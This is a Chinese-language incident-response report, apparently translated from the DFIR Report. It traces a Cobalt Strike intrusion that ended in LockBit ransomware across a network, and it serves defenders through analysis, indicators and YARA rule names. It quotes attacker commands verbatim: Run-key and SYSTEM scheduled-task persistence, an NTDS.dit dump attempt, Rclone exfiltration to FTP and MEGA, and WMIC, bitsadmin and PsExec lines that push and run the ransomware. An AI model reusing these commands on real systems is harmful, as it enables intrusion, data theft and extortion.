Cobalt Strike 和 SOCKS 导致 LockBit 勒索软件

关键要点

• 此次入侵始于下载并执行冒充 Windows Media 配置实用程序的 Cobalt Strike 信标。

• 威胁者使用 Rclone 从环境中窃取数据。他们首先尝试 FTP 传输，但失败了，然后转而使用MEGA.io。一天后，他们又成功进行了第二次 FTP 窃取。

• 威胁行为者使用计划任务、GhostSOCKS 和 SystemBC 代理以及 Cobalt Strike 命令和控制访问，在环境中创建了多个持久后门。

• LockBit 勒索软件在入侵后的第 11 天就已在整个环境中部署。

案例摘要

此次入侵始于 2024 年 1 月底，当时用户下载并执行了一个文件，该文件使用与合法的 Microsoft Windows Media 配置实用程序相同的名称 (setup_wm.exe) 和可执行文件图标。此可执行文件是一个 Cobalt Strike 信标，一旦执行，就会建立出站连接。

首次执行后约 30 分钟，Cobalt Strike 信标启动了发现命令，首先使用 nltest 来识别域控制器。由于最初受感染用户的权限提升，威胁行为者利用 SMB 和远程服务将两个代理工具（SystemBC 和 GhostSOCKS）部署到域控制器上。

Windows Defender 在域控制器上检测到了这些工具，最初让我们认为它们都被阻止了。然而，虽然 GhostSOCKS 被成功阻止，但 SystemBC 代理仍然处于活动状态，从域控制器建立了命令和控制通道。然后，威胁行为者从滩头主机继续他们的行动，执行额外的态势感知命令。然后，他们将代码注入 WUAUCLT.exe 进程，然后从 LSASS 进程中提取凭据。

观察到注入的进程将 Seatbelt 和 SharpView CLR 模块加载到其内存空间中。同时，威胁行为者通过创建计划任务来在滩头主机上执行 SystemBC 和 GhostSOCKS 代理，从而建立了持久性。

入侵大约一小时后，威胁行为者利用远程服务，使用与在滩头执行初始访问文件相同的帐户，横向移动到文件服务器。该服务部署了一个 Cobalt Strike PowerShell 信标，它与与初始访问恶意软件相关联的命令和控制服务器不同的命令和控制服务器进行通信。

在文件服务器上，威胁行为者使用与滩头主机上观察到的相同的计划任务部署了相同的代理工具。这启用了通过 SystemBC 和 GhostSOCKS 代理进行的命令和控制通信。不久之后，威胁行为者通过已建立的代理隧道之一启动了与文件服务器的 RDP 会话。

威胁行为者在访问主机上的本地组策略编辑器之前，使用任务管理器检查了正在运行的进程。证据表明，他们专门检查了 Windows Defender 配置。在此活动发生几分钟后，我们就观察到了对 Windows Defender 设置的注册表修改，这让我们得出结论，威胁行为者在本地组策略编辑器中进行了更改。

威胁行为者探索了服务器上的文件共享，发现了一份包含存储凭据的敏感文档。接下来，他们尝试将 Cobalt Strike PowerShell 信标部署到备份服务器。当初次尝试失败时，他们从滩头主机发出远程 WMI 命令，以禁用目标服务器上的 Windows Defender 实时监控。不久之后，他们为 Cobalt Strike 信标启动了一项新的远程服务，该服务成功建立了与命令和控制服务器的连接。

威胁行为者通过启动远程 PowerShell 会话来执行 Active Directory 侦察命令，从而继续进行发现工作。他们还尝试访问域控制器上的 NTDS.dit 文件；但是，Windows Defender 似乎阻止了此尝试。同时，在文件服务器上，威胁行为者执行了名为 check.exe 的二进制文件，该二进制文件进行了各种发现活动。此工具探测远程主机，收集其可用性、磁盘使用情况和已安装程序等信息。

威胁者通过 RDP 访问备份服务器，查看备份配置并部署 GhostSOCKS 代理，设置计划任务以实现持久性。此后，他们的活动暂停了大约两个小时，然后才恢复。

在初次访问后大约四小时，威胁行为者开始进行数据泄露活动。研究人员观察到他们在文件服务器上使用 Internet Explorer 访问多个临时文件共享网站。虽然这些网站通常用于暂存有效载荷，但未检测到任何下载。这表明威胁行为者很可能是在开始数据泄露，而不是检索其他工具。

在初次尝试泄露数据约 20 分钟后，威胁行为者转而使用 Rclone 进行数据泄露。他们最初通过 FTP 泄露数据的努力失败了，因为所有连接到其配置的 FTP 服务器的尝试均未成功。这种明显的挫败感导致他们的活动暂停了几个小时。返回后，他们在文件服务器上部署了一个新的 GhostSOCKS 二进制文件，这次是通过注册表运行项而不是之前使用的计划任务来建立持久性。

威胁者再次尝试使用 Rclone 进行数据泄露，这次将 Mega.io 定为远程目标。成功建立连接后，大规模数据泄露持续了大约 40 分钟。

经过 15 小时的平静之后，威胁者通过检查域控制器上的 DNS 管理器中的 DNS 配置恢复了活动。然后，他们返回文件服务器，并使用 Rclone 和新配置的 FTP 服务器重新尝试进行数据泄露。这一次，连接成功，能够连续向 FTP 服务器传输数据约 16 小时。同时，在数据泄露过程中，他们访问了备份服务器并执行了 PowerShell 脚本，以从备份软件的数据库中提取存储的凭据。

威胁者一直处于潜伏状态，直到第十一天，他们将注意力转移到最终目标——勒索软件部署。他们将备份服务器指定为准备场地，投放多个批处理脚本，旨在通过内置冗余自动执行部署过程。利用 PsExec 和 BITSAdmin 等工具，他们将勒索软件二进制文件分发到远程主机，并通过 WMI 和 PsExec 远程执行。为了便于攻击，他们部署了其他脚本来禁用 Windows Defender 并修改整个网络中的 RDP 设置。

威胁者有计划地执行了这些脚本，部署了勒索软件二进制文件 ds.exe，该程序被识别为 LockBit 勒索软件。他们成功地将勒索软件传播到环境内的所有 Windows 主机，勒索软件攻击时间 (TTR) 接近 239 小时——从最初访问到全面部署历时 11 个日历日。

如果您希望在我们发布新报告时收到电子邮件，请在此处订阅。

分析师

分析和报告由r3nzsec、MyDFIR和MittenSec完成

初始访问

入侵始于 2024 年 1 月，当时执行了一个名为 setup_wm.exe 的文件，该文件是从 URL hxxps://accessservicesonline.com/setup_wm.exe 下载的

文件 setup_wm.exe 是一个用于部署 Cobalt Strike 信标的加载程序。托管该恶意文件的域 accessservicesonline[.]com 已被多家安全供应商标记为恶意域，并且与 Cobalt Strike 相关的活动有关。

执行

威胁者使用各种手段来执行恶意文件。他们在多台主机上创建了计划任务，并采取了保持持久性的方法，同时还手动运行了许多计划任务来执行各种恶意代理工具，如 SystemBC 和 GhostSOCKS。

服务执行也被广泛使用，并在横向移动部分进行了深入讨论。其他观察到的执行模式依赖于 WMI、批处理脚本和 Psexec，这些模式在其他特定于其用途的部分中进行了介绍。

持久性

计划任务

我们在环境中的多个系统中发现了多个计划任务。这些任务不仅限于滩头主机，而是在整个受感染的网络中都可见到。

计划任务配置 XML 示例：

注册表运行键

作为第二种持久性方法，威胁行为者利用 Windows 注册表中的“Run”键在用户登录时自动执行 GhostSOCKS 负载。这是通过以下 PowerShell 命令实现的：

powershell -WindowStyle hidden -Command “if (-Not (Test-Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run\App')) { Set-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -Name 'App' -Value '%PUBLIC%\Music\svchosts.exe' }”

权限提升

威胁行为者利用进程注入技术，例如注入合法进程 WUAUCLT.exe，来访问关键系统资源，包括 LSASS 内存空间。

此外，威胁行为者还在 SYSTEM 权限下创建并执行了计划任务，以保持持久性。例如，他们通过计划任务部署 DLL 文件（svcmc.dll 和 svcmcc.dll），确保它们在系统启动时执行。这些任务是使用以下命令创建和运行的：

schtasks /create /ru SYSTEM /sc ONSTART /tn Update2 /tr "cmd /c rundll32 %PUBLIC%musicsvcmc.dll，MainFunc" schtasks /run /TN Update2

此外，在横向移动过程中，攻击者利用管理权限在文件服务器上执行基于 PowerShell 的 Cobalt Strike 负载。攻击者还利用 SMB 传输 SystemBC DLL 和 Golang 后门等工具，这些工具均通过 SYSTEM 级计划任务执行。

防御规避

为了欺骗用户，加载程序使用相同的文件名和可执行图标模仿合法的 Microsoft Windows Media 配置实用程序。

作为其防御规避策略的一部分，威胁行为者采用了多种方法来禁用 Windows Defender。在文件服务器上，威胁行为者编辑了与 Windows Defender 相关的组策略设置。威胁行为者打开组策略：

威胁行为者感兴趣的部分：

几分钟后在主机上观察到注册表修改：

以下命令利用 WMIC 在备份服务器上远程创建一个进程。然后，此进程执行一个 PowerShell 脚本，用于禁用 Windows Defender 中的实时监控。

使用 CreateRemoteThread API 调用观察到多个系统上的各种合法进程被注入。这既发生在初始访问文件中，也发生在后来的各种 PowerShell Cobalt Strike 信标中。

凭证访问

在凭证访问阶段，威胁行为者利用注入的进程 WUAUCLT 访问滩头阵地的 LSASS 内存空间、文件服务器和备份服务器。授予的访问权限分别为 0x1010 和 0x1fffff，这两个权限都表明存在凭证窃取活动。

代码0x1010分解如下：

• 0x00000010（VMRead）：授予从进程读取内存的能力。

• 0x00001000（QueryLimitedInfo）：允许检索某些与进程相关的信息。

相比之下，代码 0x1fffff 提供了对进程的完全访问权限，使其成为凭据窃取工具的明显指标。标记为 UNKNOWN 的可疑 CallTrace 也揭示了注入的代码活动。

此外，威胁行为者还尝试通过 PowerShell 远程处理使用 NTDSUtil 来提取凭据。但是，此尝试被 Windows Defender 阻止。

尝试 NTDS.dit 转储：

C:WindowsSystem32ntdsutil.exe ac in ntds ifm cr fu C:userspublicmusic1

Windows Defender 事件日志表明转储凭据的尝试已被阻止：

在备份服务器上，威胁行为者执行了名为 Veeam-Get-Creds.ps1 的 PowerShell 脚本。此脚本在 GitHub 上公开提供，可作为从 Veeam Backup and Replication 凭证管理器恢复密码的方法。

此外，在文件服务器上，威胁行为者能够找到与共享帐户有关的文件：

发现

安装_wm.exe

初次访问发生后约一小时，从运行著名的 nltest Microsoft 实用程序的 Cobalt Stike 信标中观察到单个 PowerShell 命令，以发现 Active Directory 域控制器。

此后，威胁行为者立即转向域控制器。但在获得对该主机的横向访问权后，他们返回滩头阵地进行更多发现行动。

大约在同一时间，在滩头阵地上，还观察到注入的进程 WUAUCLT.exe 正在加载 Seatbelt 和 SharpView 模块。

• Seatbelt是一款后漏洞利用工具，旨在收集有关系统的侦察信息。它可以收集安全设置、凭证、浏览器历史记录等数据。

• SharpView是一种 AD 侦察工具，可以映射整个 AD 环境并提供用户、组、权限和关系等关键详细信息。

第一天，威胁行为者将二进制 check.exe 放到了文件服务器上。

该 Visual Basic GUI 软件接受 IP 地址作为输入并生成包含相应计算机详细信息的多个文件。

在威胁行为者运行 check.exe 的同时，他们启动了与域控制器的远程 PowerShell 会话，以使用 PowerShell 运行一些 Active Directory 发现。

在文件服务器上，威胁行为者多次检查 Windows 任务管理器。

在整个入侵过程中，威胁行为者检查了组策略设置。第一天，他们检查了文件服务器上的 Windows Defender 设置。最后一天，他们在完成赎金部署后检查了备份服务器。

横向移动

远程桌面协议

在入侵过程中，威胁行为者使用 RDP 进行攻击。在前两天，他们利用文件服务器作为枢纽主机。在最后一天，他们从滩头主机向文件服务器和备份服务器发起 RDP 会话。

收集的数据中缺少来自正常 4624 事件的身份验证数据，但使用 Microsoft-Windows-TerminalServices-LocalSessionManager 事件 ID 21 日志，我们能够识别登录活动。

第一天，威胁行为者使用 WinRM 从文件服务器启动到域控制器的远程 PowerShell 会话。然后使用此会话运行 Active Directory 发现命令。此操作记录在 Windows PowerShell 日志事件 ID 4103/4104 中。

本地主机：

远程主机：

威胁行为者使用 /node 选项在备份服务器上运行远程命令，随后在勒索软件部署期间运行该命令，这将在防御逃避和影响部分进一步介绍。

执行

威胁行为者使用 Systinternal 的 Psexec 进行与勒索软件部署相关的远程执行活动，如“影响”部分所述。

远程服务/SMB

威胁行为者反复利用远程服务来促进网络内的横向移动。他们的活动始于将 SystemBC 和 GhostSOCKS 代理工具部署到域控制器。

以下数据说明了用于将代理工具传输到域控制器的 SMB 网络活动：

远程服务创建：

这种远程服务创建也可以通过网络使用 IDS 检测（例如 ET RPC DCERPC SVCCTL - 远程服务控制管理器访问）来识别。

随后他们利用 Cobalt Strike 的跳转 psexec_psh 功能通过远程服务在文件共享服务器和备份服务器上执行 PowerShell 信标。

经过初始 Base64 解码后，我们发现有效载荷使用了默认的 Cobalt Strike XOR 值 35。

使用 XOR 密钥 35 解码第二层混淆后，我们得到了下一层 base64 字符串。我们可以使用 XOR 密钥 35 再次解码。下一步，我们可以使用下面的 cyber chef 配方。

Regular_expression('User defined','[a-zA-Z0-9+/=]{30,}',true,true,false,false,false,false,'List matches')
From_Base64('A-Za-z0-9+/=',true)
Gunzip()
Label('Decode')
Regular_expression('User defined','[a-zA-Z0-9+/=]{30,}',true,true,false,false,false,false,'List matches')
Conditional_Jump('',false,'',10)
From_Base64('A-Za-z0-9+/=',true)
XOR({'option':'Decimal','string':'35'},'Standard',false)

PowerShell 采用 base64 编码。解码 PowerShell 后显示 SMB 管道名为：

\.pipefullduplex_84

在使用 Didier Stevens 的1768.py脚本分析输出后，结果显示与 psexec_psh 活动相关的 Cobalt Strike shellcode 匹配。

指挥与控制

Cobalt Strike (S0154)

初始命令和控制是一个由 setup_wm.exe 执行触发的针对 compdatasystems.com 的 Cobalt Strike 信标。

作为命令和控制 (C2) 阶段的一部分，威胁行为者使用 IP 地址 159.100.14.254 通过端口 443 建立了与第二个 Cobalt Strike C2 服务器的连接。与该服务器关联的域为 retailadvertisingservices[.]com。

在此活动期间，观察到了进程注入，威胁行为者瞄准了合法进程，例如 svchost.exe。注入活动允许他们在受信任的系统进程中运行恶意代码。

与这些命令和控制服务器的通信在入侵期间持续进行。

setup_wm.exe 信标的配置如下：

{
    "BeaconType": [
        "HTTPS"
    ],
    "Port": 443,
    "SleepTime": 62760,
    "MaxGetSize": 1864954,
    "Jitter": 37,
    "C2Server": "compdatasystems.com,/_next.css",
    "HttpPostUri": "/boards",
    "Malleable_C2_Instructions": [
        "Remove 814 bytes from the beginning",
        "Base64 decode",
        "Base64 decode"
    ],
    "HttpGet_Verb": "GET",
    "HttpPost_Verb": "POST",
    "HttpPostChunk": 0,
    "Spawnto_x86": "%windir%\syswow64\WUAUCLT.exe",
    "Spawnto_x64": "%windir%\sysnative\WUAUCLT.exe",
    "CryptoScheme": 0,
    "Proxy_Behavior": "Use IE settings",
    "Watermark": 1357776117,
    "bStageCleanup": "True",
    "bCFGCaution": "False",
    "KillDate": 0,
    "bProcInject_StartRWX": "False",
    "bProcInject_UseRWX": "False",
    "bProcInject_MinAllocSize": 10425,
    "ProcInject_PrependAppend_x86": [
        "kJCQkJCQkJA=",
        "Empty"
    ],
    "ProcInject_PrependAppend_x64": [
        "kJCQkJCQkJA=",
        "Empty"
    ],
    "ProcInject_Execute": [
        "CreateThread",
        "RtlCreateUserThread",
        "CreateRemoteThread"
    ],
    "ProcInject_AllocationMethod": "VirtualAllocEx",
    "bUsesCookies": "True",
    "HostHeader": "Host: user.compdatasystems.com"
}

系统BC

通过动态分析，我们能够确定几个被释放的文件是 SystemBC。

与 SystemBC 命令和控制服务器的通信从第一天开始，并持续整个入侵过程。

GhostSOCKS

分析显示，另一个部署的代理是 GhostSOCKS，一种恶意软件即服务 (MaaS) 工具。

这些二进制文件部署在滩头主机以及文件共享服务器和备份服务器上。执行后，这些二进制文件会到达以下命令和控制服务器：

仅在第一天观察到 GhostSocks 服务器的流量。

泄漏

威胁行为者从文件共享服务器打开了 Internet Explorer 并访问了两个网站，qaz[.]im 和 temp[.]sh。

这两个网站都被称为匿名临时文件共享服务。它们经常被威胁者用来部署工具或有效载荷，但在这种情况下，我们没有观察到任何下载。这让我们判断，他们可能利用这些网站进行一些小规模的数据泄露。

大约 20 分钟后，威胁行为者开始使用 Rclone 进行大规模渗透。

他们最初尝试使用 Rclone 窃取数据，利用 FTP 配置通过端口 21 瞄准位于 93.115.26.127 的远程服务器。由于无法建立与远程服务器的连接，因此这次窃取数据的尝试失败了。

执行的命令是：

"%PUBLIC%Musicrclone.exe" copy E:REDACTEDcustomers ftp1:REDACTED/customers -q --ignore-existing --REDACTED-confirm --multi-thread-streams 12 --transfers 12 --no-console

两个小时后，威胁行为者改变了策略，利用 Rclone 的 MEGA 集成将数据泄露到Mega.io。在第二次尝试中执行了以下命令：

%WINDIR%system32cmd.exe /C .rclone.exe copy "E:REDACTEDdomain" mega:REDACTED/domain -q --ignore-existing --REDACTED-confirm --multi-thread-streams 12 --transfers 12 --no-console

初次尝试成功导致数据泄露至Mega.io存储服务。第二天，威胁行为者利用第二个 FTP 帐户和硬编码到 rclone 配置中的另一台服务器，再次成功泄露数据。

网络日志分析显示，16 小时内有数 GB 的数据被泄露。

影响

第十一天，威胁者开始部署勒索软件。最后阶段包括跨网络部署的准备步骤。该过程从执行名为 SETUP.bat 的批处理脚本开始，该脚本创建了一个暂存文件共享：

"%WINDIR%System32cmd.exe" /C "%PUBLIC%MusicSETUP.bat"
net session
net share share$=%PUBLIC%Music /GRANT:Everyone,READ /Y

为便于部署勒索软件，多个文件（包括 LockBit 勒索软件加密器、ds.exe、PSExec 和其他辅助批处理脚本）被上传到此共享目录。这些脚本包含用于共享勒索软件二进制文件和执行它的冗余。

接下来，名为 WMI.bat 的脚本利用 WMI 将勒索软件负载从共享目录 (SHARE$) 复制到本地机器并执行。值得注意的是，威胁行为者并没有将目标限制在特定主机上，而是瞄准了已识别子网内所有可访问的主机。负载执行命令如下：

%WINDIR%system32cmd.exe /c ""%PUBLIC%MusicWMI.bat" %PUBLIC%MusicSETUP.bat %PUBLIC%MusicCOPY.bat %PUBLIC%MusicDEF.bat %PUBLIC%Musicds.exe"

WMI 命令进一步促进了有效载荷的分发，利用 bitsadmin 在远程主机上传输和执行勒索软件。这些命令触发了父子进程链，例如从 bitsadmin 命令生成的 wmiprvse.exe：

wmic /node:ipv4address,REDACTED,REDACTED,REDACTED,REDACTED /user:"domain.localAdministrator" /password:"REDACTED" process call create "cmd.exe /c bitsadmin /transfer update_service \REDACTEDshare$ds.exe %APPDATA%ds.exe&%APPDATA%ds.exe -pass REDACTED"

此外，威胁行为者还使用了一个名为 COPY.bat 的批处理脚本，使用 PSExec 将有效负载从共享目录复制到目标计算机。PSExec 执行的证据可通过服务创建事件（事件 ID 7045）和 PSEXESVC.exe 的执行来识别。相关命令如下：

源主机执行copy.bat并扩展PsExec.exe ：

PsExec.exe /accepteula @comps1.txt -u "domain.localAdministrator" -p "REDACTED" cmd /c COPY "\REDACTEDshare$ds.exe" "%WINDIR%temp"

1.源主机执行

%WINDIR%system32cmd.exe /c ""%PUBLIC%Musicshare$COPY.bat"
       └── "PsExec.exe /accepteula -d \REDACTED -u "domain.localAdministrator" -p "REDACTED" cmd /c COPY /Y "\REDACTEDshare$ds.exe" "%PUBLIC%Music"

目标主机执行命令将 LockBit 加密器复制到本地机器：

2. 服务执行（目标主机）

PSEXECSVC.exe
       └── "cmd" /c COPY /Y "\REDACTEDshare$ds.exe" "%PUBLIC%Music"

威胁行为者使用名为 EXE1.bat 的批处理文件执行 LockBit 加密器，该文件利用 PSExec 在主机上运行勒索软件二进制文件 ds.exe，并将其复制到 Windows 临时文件夹中。

通过 PSExec 从源主机执行 LockBit：

%WINDIR%system32cmd.exe /c ""C:share$EXE1.bat" " 
       └── C:share$PsExec.exe -d @C:share$comps1.txt -u "domain.localAdministrator" -p "REDACTED" cmd /c %WINDIR%tempds.exe -pass REDACTED

威胁行为者还利用修改后的 WMI1.bat 版本通过 WMI 命令分发和执行有效负载，以输入文件中列出的主机为目标。此阶段表现出与之前类似的进程行为，wmiprvse.exe 生成传输任务：

1.通过 WMIC 从源主机执行 LockBit：

%WINDIR%system32cmd.exe /c ""C:share$WMI1.bat" "
       └── wmic /node:@C:share$comps1.txt /user:"domain.localAdministrator" /password:"REDACTED" process call create "cmd.exe /c bitsadmin /transfer ds \REDACTEDshare$ds.exe %APPDATA%ds.exe&%APPDATA%ds.exe -pass REDACTED"

与之前的 WMI 执行类似，在远程主机上，wmiprvse.exe 将负责生成 Bitsadmin 传输作业。

1.通过 WMIC 在目标主机上执行 LockBit：

wmiprvse.exe
       └── cmd.exe /c bitsadmin /transfer ds \REDACTEDshare$ds.exe %APPDATA%ds.exe&%APPDATA%ds.exe -pass REDACTED
           └── bitsadmin /transfer ds \REDACTEDshare$ds.exe %APPDATA%ds.exe

整个部署活动大约耗时两个小时。尽管执行过程中出现了几个错误，威胁行为者还是成功部署了 LockBit 勒索软件。加密主机显示修改后的桌面背景，将用户重定向到勒索信。

时间线

钻石模型

指标

hxxps://accessservicesonline[.]com/setup_wm.exe 

Cobalt Strike：
31.172.83[.]162:443 
user[.]compdatasystems[.]com 
compdatasystems[.]com 
159.100.14[.]254:443 
retailadvertisingservices[.]com 

SystemBC：
185.236.232[.]20:445 

GhostSOCKS：
91[.]142[.]74[.]28|30001 
195[.]2[.]70[.]38|30001 
38[.]180[.]61[.]247|30001 

FTP 泄露服务器：
93.115.26[.]127:21 
46.21.250[.]52:21

文件：svchosts.exe 
6505b488d0c7f3eaee66e3db103d7b05 
bf2b396b8fb0b1de27678aab877b6f177546d1c5 
b4ad5df385ee964fe9a800f2cdaa03626c8e8811ddb171f8e821876373335e63文件

： dfg.exe 
671b967eb2bc04a0cd892ca225eb5034 
ab1777107d9996e647d43d1194922b810f198514 
b79bb3302691936df7c3315ff3ba7027f722fc43d366ba354ac9c3dac2e01d03

文件：svc.dll 
03af38505cee81b9d6ecd8c1fd896e0e 
1ac66fcc34c0b86def886e4e168030dae096927c 
2389b3978887ec1094b26b35e21e9c77826d91f7fa25b2a1cb5ad836ba2d7ec4

文件：Veeam-Get-Creds.ps1 
0f7b6bb3a239cf7a668a8625e6332639 
5263a135f09185aa44f6b73d2f8160f56779706d 
18051333e658c4816ff3576a2e9d97fe2a1196ac0ea5ed9ba386c46defafdb88

文件：svcmc.dll 
ea327ed0a3243847f7cd87661e22e1de 
450d54d5737164579416ca99af1eb3fa1d4aaff9 
ced4ee8a9814c243f0c157cda900def172b95bb4bc8535e480fe432ab84b9175

文件：setup_wm.exe 
57f791f7477b1f7a1b3605465d054db8 
bba1bc3ebf07ca3c4e2442f0ba9ea18383ce627b 
d8b2d883d3b376833fa8e2093e82d0a118ba13b01a2054f8447f57d9fec67030

文件：check.exe 
6e91c474d90546845b1f3f9e7a33411a 
9352236ad6fe8835979cf11ba5033f8f2fef0f19 
3f97e112f0c5ddf0255ef461746a223208dc0846bde2a6dca9c825d9c706a4e9

文件：svcmcc.dll 
0aa05ebc3b6667954898cfccc4057600 
c59cbd309b3393cb08a1133364ed11000fdd418d 
44cf04192384e920215f0e335561076050129ad7a43b58b1319fa1f950f6a7b6

文件：sd.exe 
2800a10c4afae44978d906b2abaed745 
84019de427aef1f1e4f32b579767bee6d0bd1e64 
c1173628f18f7430d792bbbefc6878bced4539c8080d518555d08683a3f1a835

文件：SETUP.bat 
d9adb3dd6df169e824b2867a2b8cba89 
b077ea03b207cc8b8b48b9b4f9a58dabbd39f678 
7673a949181e33ff8ed77d992a2826c25b8da333f9e03213ae3a72bb4e9a705d

文件：ds.exe 
71c8c1a0056fd084bc32a03d9245ad10 
5de1f72ffeea1ecbd287b0ca8ddb2c5264d9acb5 
59c9d10f06f8cb2049df39fb4870a81999fd3f8a79717df9b309fadeb5f26ef9

文件：EXE1.bat 
573a213191985c555dd7e8de5f0a9cae 
aa19a1648d680c3bfbee7dcc3df41ce98af8e121 
ba9b879fdc304bd7f5554528fb8e858ef36ad4657fedfefb8495f43ce73fc6f1

文件：EXE.bat 
4457256150386acec794e9e8ee412691 
c6d54322a17e754150e61f7caa91226a84b0b774 
10ce939e4ee8b5285d84c7d694481ebbdf986904938d07f7576d733e830ed012

文件：COPY.bat 
6d44c5fb49258f285769e50830fc59af 
da6771fbbcfaf195b80925cefc880794d62d61bf 
3af3f2d08aa598ab4f448af1b01a5ad6c0f8e8982488ebf4e7ae7b166e027a8b

文件：WMI.bat 
40852fde665eb9119fcc565bd68de680
956e020206c4dc4240537d07be022e86ed918ed1 
578a2ac45e40a686a5f625bbc7873becd8eb9fe58ea07b1d318b93ee0d127d4e

文件：RDP.bat 
996ad32c7ae2190b7fa7876df0d7b717 
4a1e667e0c3550f4446903570adbe7776699d4ca 
791157675ad77b0ae9feabd76f4b73754a7537b7a9a2cc74bd0924d65be680e1

文件：WMI1.bat 
90f9044cfee2c678fe51abd098bdfe97 
e3619582f4d81ca180dee161bbe49d499b237119 
c4863cc28e01713e6a857b940873b0e5caedfd1fcb9b2a8d07ffb4c0c48379d5

文件：COPY1.bat 
b254f8f03e61bd9469df66c189d79871 
45337ae989cd62d07059f867ce62ff6b6fc90819 
9bcaad9184b182965923a141f52fb75ddd1975b99ab080869896cee5879ecfad

文件：DEF.bat 
4794accd22271a28547fb3613ee79218 
ccc6b5bf9591fa9a3d57fd48ee0c9c49a6d22da9 
53828f56c6894a468a091c8858d2e29144b68d5de8ff1d69a567e97aac996026

Yara

https://github.com/The-DFIR-Report/Yara-Rules/compare/case-27138

ELASTIC_Windows_Ransomware_Lockbit_369E1E94                                                                                                                                                                 
MALPEDIA_Win_Lockbit_Auto 
MAL_RANSOM_LockBit_Apr23_1 
MAL_RANSOM_LockBit_ForensicArtifacts_Apr23_1 
SIGNATURE_BASE_MAL_RANSOM_Lockbit_Apr23_1 
SIGNATURE_BASE_MAL_RANSOM_Lockbit_Forensicartifacts_Apr23_1
CobaltStrike_Resources_Httpsstager_Bin_v2_5_through_v4_x
CobaltStrike_Resources_Xor_Bin_v2_x_to_v4_x
CobaltStrike_Sleep_Decoder_Indicator
Cobaltbaltstrike_Beacon_XORed_x86
Cobaltbaltstrike_RAW_Payload_https_stager_x86
HKTL_CobaltStrike_Beacon_4_2_Decrypt
HKTL_CobaltStrike_Beacon_Strings
HKTL_CobaltStrike_SleepMask_Jul22
HKTL_Win_CobaltStrike
SUSP_PS1_JAB_Pattern_Jun22_1
WiltedTulip_WindowsTask
Windows_Shellcode_Generic_8c487e57
Windows_Trojan_CobaltStrike_3dc22d14
Windows_Trojan_CobaltStrike_8d5963a2
Windows_Trojan_CobaltStrike_b54b94ac
Windows_Trojan_Metasploit_24338919
Windows_Trojan_Metasploit_38b8ceec
Windows_Trojan_Metasploit_7bc0f998Windows_Trojan_Metasploit_c9773203

MITRE ATT&CK

原文始发于微信公众号（Ots安全）：Cobalt Strike 和 SOCKS 导致 LockBit 勒索软件